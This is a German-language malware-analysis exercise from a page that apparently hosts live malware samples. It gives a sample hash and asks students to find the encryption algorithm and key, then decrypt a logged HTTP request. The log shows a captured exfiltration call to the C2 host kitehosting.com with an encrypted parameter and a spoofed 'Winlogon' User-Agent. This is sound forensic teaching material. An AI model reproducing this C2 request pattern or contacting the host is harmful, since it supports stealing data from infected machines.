Sample Files
The files that are available for download here are usually malware, please treat these files accordingly. Malicious samples are packed as zip or 7zip archives with the password infected.
[imp@mal.re /tmp/classes/hsbund-2025/]$ cat aufgabe5.md
Zur Untersuchtung steht das Asservat mit der folgenden SHA-256 Prüfsumme:
```
0b38ca277bbb042d43bd1f17c4e424e167020883526eb2527ba929b2f0990a8f
```
Die Schadsoftware exfiltriert Informationen an einen HTTP-basierten C2-Server.
1. Identifizieren Sie den Algorithmus, mit dem diese Informationen verschlüsselt werden und das zugehörige kryptografische Schlüsselmaterial.
2. Vom einem mit dieser Malware infizierten System sind HTTP logs verfügbar. Welche Daten wurden gestohlen?
Request Log:
```
GET /php/loader4/loaderinfo.php?param=xqyww7ghpyB9okwB35I4tb5ZWlYhHysIW9mUDokgHsrz8smHmXmkxkwmD3DHog8rf8BcBfnmTySHiJzIvtsUMWljqR4F3APXBQZT4f0DosHzk6y5AgkCSrzvrdoEIcBh5PIhBWGQ2CToogW7+6GoqFtdHXwkwqPF HTTP/1.1
User-Agent: Winlogon
Host: kitehosting.com
Cache-Control: no-cache
```